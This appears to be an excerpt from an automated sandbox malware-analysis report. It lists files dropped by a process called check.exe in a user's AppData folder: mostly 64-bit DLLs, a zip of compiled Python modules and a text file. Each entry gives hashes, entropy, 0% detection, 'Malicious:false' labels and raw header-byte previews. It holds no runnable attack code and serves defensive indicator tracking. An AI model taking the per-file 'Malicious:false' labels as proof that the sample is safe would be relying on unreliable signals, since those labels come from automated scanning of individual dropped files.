                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........}.........../....td./..../...td./...td./...td./...n../...1../......P...c./....c./....c./...Rich...........................PE..d....p.f.........." ...(.*...........+.......................................0&...........`.............................................L.....................#.$.............%.... t.......................t..(....r..@............@..(o...........................text...~(.......*.................. ..`.rdata..x....@......................@..@.data...h...........................@....pdata..$.....#......n#.............@..@.reloc.......%......L%.............@..B........................................................................................................................................................................................................................................................................
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\HseeHuht\check.exe
                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):2494976
                                                                                                                                                                                                            Entropy (8bit):6.232020603277999
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:24576:SUjOoTFrwI8nc6EmRAQ9RzgpP2bXYUKuXeLQp5PjYq0zb:SUqCgnZXRAQ9RzggbozJLQp5Mq
                                                                                                                                                                                                            MD5:AE182C36F5839BADDC9DCB71192CFA7A
                                                                                                                                                                                                            SHA1:C9FA448981BA61343C7D7DECACAE300CAD416957
                                                                                                                                                                                                            SHA-256:A9408E3B15FF3030F0E9ACB3429000D253D3BB7206F750091A7130325F6D0D72
                                                                                                                                                                                                            SHA-512:8950244D828C5EDE5C3934CFE2EE229BE19CC00FBF0C4A7CCEBEC19E8641345EF5FD028511C5428E1E21CE5491A3F74FB0175B03DA17588DAEF918E3F66B206A
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......... j..sj..sj..sc..sn..s.p.rh..s1..rh..s.p.ri..s.p.rb..s.p.r...s...rh..s..ro..sj..s...syw.ra..syw.rk..syw.rk..sRichj..s........PE..d....p.f.........." ...(.....................................................P&...........`.........................................`&..L....&................$...............%.....................................p...@...............@{...........................text...O........................... ..`.rdata..............................@..@.data...xz.......^...t..............@....pdata........$.......#.............@..@.reloc........%......^%.............@..B........................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\HseeHuht\check.exe
                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):5144576
                                                                                                                                                                                                            Entropy (8bit):6.262739223310643
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:49152:Qi+reIG7QwktsFPKoe2yicbbqgkcY9abW7KnTYK2bjMkTDGM7y:uqT7Q1kyTvoWW7EYvM9M
                                                                                                                                                                                                            MD5:E8C3BFBC19378E541F5F569E2023B7AA
                                                                                                                                                                                                            SHA1:ACA007030C1CEE45CBC692ADCB8BCB29665792BA
                                                                                                                                                                                                            SHA-256:A1E97A2AB434C6AE5E56491C60172E59CDCCE42960734E8BDF5D851B79361071
                                                                                                                                                                                                            SHA-512:9134C2EAD00C2D19DEC499E60F91E978858766744965EAD655D2349FF92834AB267AC8026038E576A7E207D3BBD4A87CD5F2E2846A703C7F481A406130530EB0
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......................=....1M............1M.....1M.....1M.....+......t.............J......J......J.....Rich...........................PE..d....p.f.........." ...(..,...!.....P.,.......................................N...........`..........................................><.T...D?<...............H..z...........pM..O..Pa8..............................`8.@.............,..............................text.....,.......,................. ..`.rdata........,.......,.............@..@.data... :....A.......A.............@....pdata...z....H..|....H.............@..@.reloc...O...pM..P...0M.............@..B........................................................................................................................................................................................................................................................................
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\HseeHuht\check.exe
                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):120320
                                                                                                                                                                                                            Entropy (8bit):6.034057886020456
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:1536:pPd5NTdYgpmMrZhekwFH4PqgZNBQmT6V6WRFYE9Icx7pz4H5B:NhTdtmMdEkwuFTSvYE9Iczz4H5
                                                                                                                                                                                                            MD5:4F7F9E3A9466F4C0103FB04E1987E098
                                                                                                                                                                                                            SHA1:D4A339702E936AA5ECC1FE906AE2BA3BB0E481D7
                                                                                                                                                                                                            SHA-256:EBF27146466D61411493D2E243EAC691740F9C4B7A4B9AB0D408BE45B5E0AA35
                                                                                                                                                                                                            SHA-512:920BA8D58DCA7946341C1CC01FEA0B76CCE008F1D10061F84455A3DE9BA00FD9534F40C983486211BE92B85F786CD610C386529711A6F573A02BFAF8CA543A19
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........kSR...R...R...[...Z....X..P.......P....X..Q....X..Z....X.._....^..Q...R.......G_..[...G_..S...G_..S...G_..S...RichR...........PE..d.... g.........." ...(.H...........J.......................................0............`.............................................X...h................................ ..........................................@............`...............................text...(G.......H.................. ..`.rdata..lU...`...V...L..............@..@.data.... ..........................@....pdata..............................@..@.rsrc...............................@..@.reloc....... ......................@..B................................................................................................................................................................................................................................................
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\HseeHuht\check.exe
                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):120400
                                                                                                                                                                                                            Entropy (8bit):6.6017475353076716
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:1536:N9TXF5LLXQLlNycKW+D4SdqJk6aN1ACuyxLiyazYaCVoecbdhgOwAd+zfZ1zu:N9jelDoD9uyxLizzFzecbdPwA87S
                                                                                                                                                                                                            MD5:862F820C3251E4CA6FC0AC00E4092239
                                                                                                                                                                                                            SHA1:EF96D84B253041B090C243594F90938E9A487A9A
                                                                                                                                                                                                            SHA-256:36585912E5EAF83BA9FEA0631534F690CCDC2D7BA91537166FE53E56C221E153
                                                                                                                                                                                                            SHA-512:2F8A0F11BCCC3A8CB99637DEEDA0158240DF0885A230F38BB7F21257C659F05646C6B61E993F87E0877F6BA06B347DDD1FC45D5C44BC4E309EF75ED882B82E4E
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......\=..\...\...\..S$...\...$...\...\..5\...\...\.....\.....\.....\.....\......\.....\..Rich.\..........PE..d.....x.........." ...).$...d............................................................`A........................................0u..4...d}..........................PP...........^..p............................\..@............@...............................text............................... ..`fothk........0...................... ..`.rdata...C...@...D...(..............@..@.data................l..............@....pdata...............p..............@..@_RDATA...............|..............@..@.rsrc................~..............@..@.reloc..............................@..B................................................................................................................................................................................
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\HseeHuht\check.exe
                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):49744
                                                                                                                                                                                                            Entropy (8bit):6.701724666218339
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:768:ApzzO6ujT3MbR3v0Cz6SR8q83yaFdWr9zRcmgEl6U9zSC:9q/oGw3fFdwzRcmZFzSC
                                                                                                                                                                                                            MD5:68156F41AE9A04D89BB6625A5CD222D4
                                                                                                                                                                                                            SHA1:3BE29D5C53808186EBA3A024BE377EE6F267C983
                                                                                                                                                                                                            SHA-256:82A2F9AE1E6146AE3CB0F4BC5A62B7227E0384209D9B1AEF86BBCC105912F7CD
                                                                                                                                                                                                            SHA-512:F7BF8AD7CD8B450050310952C56F6A20B378A972C822CCC253EF3D7381B56FFB3CA6CE3323BEA9872674ED1C02017F78AB31E9EB9927FC6B3CBA957C247E5D57
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......?.{...{...{...0...y.......y...r.H.p...{...H.......|.......`.......~.......z.....$.z.......z...Rich{...........PE..d...l0.?.........." ...).<...8.......@...............................................b....`A........................................pm.......m..x....................r..PP......D....c..p...........................`b..@............P..`............................text....;.......<.................. ..`.rdata.."#...P...$...@..............@..@.data................d..............@....pdata...............f..............@..@.rsrc................l..............@..@.reloc..D............p..............@..B................................................................................................................................................................................................................................................................
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\HseeHuht\check.exe
                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):84240
                                                                                                                                                                                                            Entropy (8bit):6.607563436050078
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:1536:Kdrz7l1EVLsSuvX3dUK4MLgqK7YEog8y5sV8lIJLVy7SyFB:urzcuvXvrEo7y6V8lIJLVyB
                                                                                                                                                                                                            MD5:CB8C06C8FA9E61E4AC5F22EEBF7F1D00
                                                                                                                                                                                                            SHA1:D8E0DFC8127749947B09F17C8848166BAC659F0D
                                                                                                                                                                                                            SHA-256:FC3B481684B926350057E263622A2A5335B149A0498A8D65C4F37E39DD90B640
                                                                                                                                                                                                            SHA-512:E6DA642B7200BFB78F939F7D8148581259BAA9A5EDDA282C621D14BA88083A9B9BD3D17B701E9CDE77AD1133C39BD93FC9D955BB620546BB4FCF45C68F1EC7D6
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......e...!m..!m..!m..(.o.+m..1...#m..1..."m..1...%m..1...)m..1...,m..i..."m..j...#m..!m..|m..i...)m..i... m..i... m..i... m..Rich!m..........PE..d.....g.........." ...).....\......0........................................P......7[....`.............................................H...(........0....... .. ......../...@..........T...........................`...@...............x............................text............................... ..`.rdata...=.......>..................@..@.data...............................@....pdata.. .... ......................@..@.rsrc........0......................@..@.reloc.......@......................@..B........................................................................................................................................................................................................................................
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\HseeHuht\check.exe
                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):131344
                                                                                                                                                                                                            Entropy (8bit):6.311142284249784
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3072:3RF024DWkT/DKGkXY402iXnVJf/FO50XnekZ39gPhvEQZIJyPArm:j0nHT/DKFXZorf/FO50uW3SEQt
                                                                                                                                                                                                            MD5:A55E57D7594303C89B5F7A1D1D6F2B67
                                                                                                                                                                                                            SHA1:904A9304A07716497CF3E4EAAFD82715874C94F1
                                                                                                                                                                                                            SHA-256:F63C6C7E71C342084D8F1A108786CA6975A52CEFEF8BE32CC2589E6E2FE060C8
                                                                                                                                                                                                            SHA-512:FFA61AD2A408A831B5D86B201814256C172E764C9C1DBE0BD81A2E204E9E8117C66F5DFA56BB7D74275D23154C0ED8E10D4AE8A0D0564434E9761D754F1997FC
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........h~..............q...............................................q.......q......!u.............................................Rich....................PE..d.....g.........." ...).............h....................................... .......Z....`.........................................P.................................../...........=..T............................;..@............0...............................text............................... ..`.rdata...y...0...z..................@..@.data....$....... ..................@....pdata..............................@..@.rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\HseeHuht\check.exe
                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):277776
                                                                                                                                                                                                            Entropy (8bit):6.5855511991551
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:6144:x9iD78EIq4x4OA5bZZ0KDgQcI79qWM53pLW1AFR8E4wXw76TPlpV77777VMvyk:xwDGqr5b8EgQ5+w6k
                                                                                                                                                                                                            MD5:F3377F3DE29579140E2BBAEEFD334D4F
                                                                                                                                                                                                            SHA1:B3076C564DBDFD4CA1B7CC76F36448B0088E2341
                                                                                                                                                                                                            SHA-256:B715D1C18E9A9C1531F21C02003B4C6726742D1A2441A1893BC3D79D7BB50E91
                                                                                                                                                                                                            SHA-512:34D9591590BBA20613691A5287EF329E5927A58127CE399088B4D68A178E3AF67159A8FC55B4FCDCB08AE094753B20DEC2AC3F0B3011481E4ED6F37445CECDD5
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........j2U..\...\...\..s....\..]...\.._...\..X...\..Y...\...]...\..s]...\...].z.\..._...\...Q...\...\...\.......\...^...\.Rich..\.........................PE..d......g.........." ...).....Z...............................................P......W.....`.................................................L........0..........t+......./...@..........T...............................@............... ............................text.............................. ..`.rdata..\...........................@..@.data...8'......."..................@....pdata..t+.......,..................@..@.rsrc........0......................@..@.reloc.......@......................@..B........................................................................................................................................................................................................................
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\HseeHuht\check.exe
                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):64272
                                                                                                                                                                                                            Entropy (8bit):6.220967684620152
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:768:eNJI0DWiflFwY9X3Th1JnptE462TxNvdbj4dIJvI75YiSyvE62Em:2LDxflFwY9XDhPfVNv+dIJvIF7Syc6c
                                                                                                                                                                                                            MD5:32D76C9ABD65A5D2671AEEDE189BC290
                                                                                                                                                                                                            SHA1:0D4440C9652B92B40BB92C20F3474F14E34F8D62
                                                                                                                                                                                                            SHA-256:838D5C8B7C3212C8429BAF612623ABBBC20A9023EEC41E34E5461B76A285B86C
                                                                                                                                                                                                            SHA-512:49DC391F4E63F4FF7D65D6FD837332745CC114A334FD61A7B6AA6F710B235339964B855422233FAC4510CCB9A6959896EFE880AB24A56261F78B2A0FD5860CD9
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........W.A.6...6...6...N%..6.......6.......6.......6.......6.......6...N...6.......6...6..26.......6.......6....I..6.......6..Rich.6..........PE..d......g.........." ...).P...~.......=..............................................!.....`.........................................p...P................................/......X....l..T............................k..@............`...............................text....N.......P.................. ..`.rdata...M...`...N...T..............@..@.data...............................@....pdata..............................@..@.rsrc...............................@..@.reloc..X...........................@..B........................................................................................................................................................................................................................................
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\HseeHuht\check.exe
                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):157968
                                                                                                                                                                                                            Entropy (8bit):6.854644275249963
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3072:KbbS4R/G4Z8r7NjwJTSUqCRY4By7znfB9mNowgn0lCelIJ012+j:KbR/8oWeBi5YOwflCe8o
                                                                                                                                                                                                            MD5:1BA022D42024A655CF289544AE461FB8
                                                                                                                                                                                                            SHA1:9772A31083223ECF66751FF3851D2E3303A0764C
                                                                                                                                                                                                            SHA-256:D080EABD015A3569813A220FD4EA74DFF34ED2A8519A10473EB37E22B1118A06
                                                                                                                                                                                                            SHA-512:2B888A2D7467E29968C6BB65AF40D4B5E80722FFDDA760AD74C912F3A2F315D402F3C099FDE82F00F41DE6C9FAAEDB23A643337EB8821E594C567506E3464C62
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........7...V.,.V.,.V.,...,.V.,..-.V.,..-.V.,..-.V.,..-.V.,..-.V.,...-.V.,.V.,.V.,..-.V.,..-.V.,..u,.V.,..-.V.,Rich.V.,................PE..d......g.........." ...).`...........1.......................................p.......P....`.............................................L.......x....P.......0.......:.../...`..4....|..T...........................P{..@............p...............................text...^^.......`.................. ..`.rdata.......p.......d..............@..@.data........ ......................@....pdata.......0......................@..@.rsrc........P......................@..@.reloc..4....`.......8..............@..B........................................................................................................................................................................................................................................
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\HseeHuht\check.exe
                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):33552
                                                                                                                                                                                                            Entropy (8bit):6.446391764486538
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:384:7GpPCRjqMu/AoS6rf7sif0NHQibZIJ9UoOHQIYiSy1pCQ5xX1rSJIVE8E9VF0Nyf:fkTM6rg9aeZIJ9Uok5YiSyvTo2Et
                                                                                                                                                                                                            MD5:1C03CAA59B5E4A7FB9B998D8C1DA165A
                                                                                                                                                                                                            SHA1:8A318F80A705C64076E22913C2206D9247D30CD7
                                                                                                                                                                                                            SHA-256:B9CF502DADCB124F693BF69ECD7077971E37174104DBDA563022D74961A67E1E
                                                                                                                                                                                                            SHA-512:783ECDA7A155DFC96A718D5A130FB901BBECBED05537434E779135CBA88233DD990D86ECA2F55A852C9BFB975074F7C44D8A3E4558D7C2060F411CE30B6A915F
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........T...........-.........................................................................A...........Rich...................PE..d.....g.........." ...).....:.......................................................r....`.........................................PD..L....D..d....p.......`..l....T.../..........@4..T............................3..@............0...............................text............................... ..`.rdata..2....0....... ..............@..@.data........P.......>..............@....pdata..l....`.......D..............@..@.rsrc........p.......H..............@..@.reloc...............R..............@..B........................................................................................................................................................................................................................................
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\HseeHuht\check.exe
                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):83728
                                                                                                                                                                                                            Entropy (8bit):6.331814573029388
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:1536:XuV3gvWHQdMq3ORC/OypTXQlyJ+9+nzEYwsBI6tzOKuZIJywJ7Sy21:XuVQvcQTSypTXQlyJs+nzEYJI6QlZIJY
                                                                                                                                                                                                            MD5:FE896371430BD9551717EF12A3E7E818
                                                                                                                                                                                                            SHA1:E2A7716E9CE840E53E8FC79D50A77F40B353C954
                                                                                                                                                                                                            SHA-256:35246B04C6C7001CA448554246445A845CE116814A29B18B617EA38752E4659B
                                                                                                                                                                                                            SHA-512:67ECD9A07DF0A07EDD010F7E3732F3D829F482D67869D6BCE0C9A61C24C0FDC5FF4F4E4780B9211062A6371945121D8883BA2E9E2CF8EB07B628547312DFE4C9
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............ll}.ll}.ll}...}.ll}..m|.ll}..o|.ll}..h|.ll}..i|.ll}..m|.ll}.lm}.ll}..m|.ll}..a|.ll}..l|.ll}..}.ll}..n|.ll}Rich.ll}........PE..d.....g.........." ...).x.......... -.......................................`.......s....`.........................................@...P............@.......0.........../...P..........T...........................@...@............................................text....w.......x.................. ..`.rdata.. y.......z...|..............@..@.data...............................@....pdata.......0......................@..@.rsrc........@......................@..@.reloc.......P......................@..B................................................................................................................................................................................................................................................
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\HseeHuht\check.exe
                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):181520
                                                                                                                                                                                                            Entropy (8bit):5.972827303352998
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3072:kO+IWyXHllRhN1qhep7fM6CpqjZI8u7pUULbaLZErWreVEzvT3iFCNc6tYwJc1OW:kpSrhN1E2M6CpUuwg5dEW7
                                                                                                                                                                                                            MD5:1C0E3E447F719FBE2601D0683EA566FC
                                                                                                                                                                                                            SHA1:5321AB73B36675B238AB3F798C278195223CD7B1
                                                                                                                                                                                                            SHA-256:63AE2FEFBFBBBC6EA39CDE0A622579D46FF55134BC8C1380289A2976B61F603E
                                                                                                                                                                                                            SHA-512:E1A430DA2A2F6E0A1AED7A76CC4CD2760B3164ABC20BE304C1DB3541119942508E53EA3023A52B8BADA17A6052A7A51A4453EFAD1A888ACB3B196881226C2E5C
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......FM.^.,k..,k..,k..T...,k...j..,k...h..,k...o..,k...n..,k.J.j..,k...j..,k..,j..-k.ITj..,k.J.f..,k.J.k..,k.J....,k.J.i..,k.Rich.,k.................PE..d......g.........." ...)............ /..............................................R\....`.............................................d................................/..............T...........................P...@............................................text...0........................... ..`.rdata..D%.......&..................@..@.data...`...........................@....pdata...............n..............@..@.rsrc................z..............@..@.reloc..............................@..B................................................................................................................................................................................................................................
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\HseeHuht\check.exe
                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):38160
                                                                                                                                                                                                            Entropy (8bit):6.338856805460127
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:768:fEkK9VgWOZbs3550QcJpPllIJLiX5YiSyvQ602Euf0:fE93jkbQcJvlIJLiJ7Syq00
                                                                                                                                                                                                            MD5:1C30CC7DF3BD168D883E93C593890B43
                                                                                                                                                                                                            SHA1:31465425F349DAE4EDAC9D0FEABC23CE83400807
                                                                                                                                                                                                            SHA-256:6435C679A3A3FF4F16708EBC43F7CA62456C110AC1EA94F617D8052C90C143C7
                                                                                                                                                                                                            SHA-512:267A1807298797B190888F769D998357B183526DFCB25A6F1413E64C5DCCF87F51424B7E5D6F2349D7A19381909AB23B138748D8D9F5858F7DC0552F5C5846AC
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........H2.&a.&a.&a..a.&a..'`.&a..%`.&a.."`.&a..'`.&a..#`.&a..'`.&a.'a..&a.."`.&a../`.&a..&`.&a...a.&a..$`.&aRich.&a................PE..d.....g.........." ...).,...<.......)..............................................'.....`.........................................0V..H...xV.......................f.../......x...tG..T............................C..@............@.......T..@....................text....*.......,.................. ..`.rdata..d ...@..."...0..............@..@.data........p.......R..............@....pdata...............V..............@..@.rsrc................Z..............@..@.reloc..x............d..............@..B................................................................................................................................................................................................................................
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\HseeHuht\check.exe
                                                                                                                                                                                                            File Type:Zip archive data, at least v2.0 to extract, compression method=store
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):1394456
                                                                                                                                                                                                            Entropy (8bit):5.531698507573688
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:12288:IW7WpLV6yNLeGQbVz3YQfiBgDPtLwjFx278e6ZQnHS91lqyL+DXUgnxOr+dx5/GO:B7WpLtHa9BHSHAW+dx5/GP05vddD
                                                                                                                                                                                                            MD5:A9CBD0455B46C7D14194D1F18CA8719E
                                                                                                                                                                                                            SHA1:E1B0C30BCCD9583949C247854F617AC8A14CBAC7
                                                                                                                                                                                                            SHA-256:DF6C19637D239BFEDC8CD13D20E0938C65E8FDF340622FF334DB533F2D30FA19
                                                                                                                                                                                                            SHA-512:B92468E71490A8800E51410DF7068DD8099E78C79A95666ECF274A9E9206359F049490B8F60B96081FAFD872EC717E67020364BCFA972F26F0D77A959637E528
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:PK..........!..b.e............_collections_abc.pyc......................................\.....S.r.S.S.K.J.r.J.r. .S.S.K.r.\.".\.\.....5.......r.\.".S.5.......r.S...r.\.".\.5.......r.C./.S.Q.r.S.r.\.".\.".S.5.......5.......r.\.".\.".\.".5.......5.......5.......r.\.".\.".0.R%..................5.......5.......5.......r.\.".\.".0.R)..................5.......5.......5.......r.\.".\.".0.R-..................5.......5.......5.......r.\.".\."./.5.......5.......r.\.".\.".\."./.5.......5.......5.......r.\.".\.".\.".S.5.......5.......5.......r.\.".\.".\.".S.S.-...5.......5.......5.......r.\.".\.".\.".5.......5.......5.......r.\.".\.".S.5.......5.......r \.".\.".S.5.......5.......r!\.".\.".\"".5.......5.......5.......r#\.".0.R%..................5.......5.......r$\.".0.R)..................5.......5.......r%\.".0.R-..................5.......5.......r&\.".\.RN..................5.......r(S...r)\)".5.......r*C)\.".S...".5.......5.......r+S...r,\,".5.......r,\.".\,5.......r-\,R]..................5.......
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\HseeHuht\check.exe
                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):299427
                                                                                                                                                                                                            Entropy (8bit):6.047872935262006
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:6144:QW1x/M8fRR1jplkXURrVADwYCuCigT/QRSRqNb7d8iu5Nahx:QWb/TRJLWURrI5RWavdF08/
                                                                                                                                                                                                            MD5:50EA156B773E8803F6C1FE712F746CBA
                                                                                                                                                                                                            SHA1:2C68212E96605210EDDF740291862BDF59398AEF
                                                                                                                                                                                                            SHA-256:94EDEB66E91774FCAE93A05650914E29096259A5C7E871A1F65D461AB5201B47
                                                                                                                                                                                                            SHA-512:01ED2E7177A99E6CB3FBEF815321B6FA036AD14A3F93499F2CB5B0DAE5B713FD2E6955AA05F6BDA11D80E9E0275040005E5B7D616959B28EFC62ABB43A3238F0
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
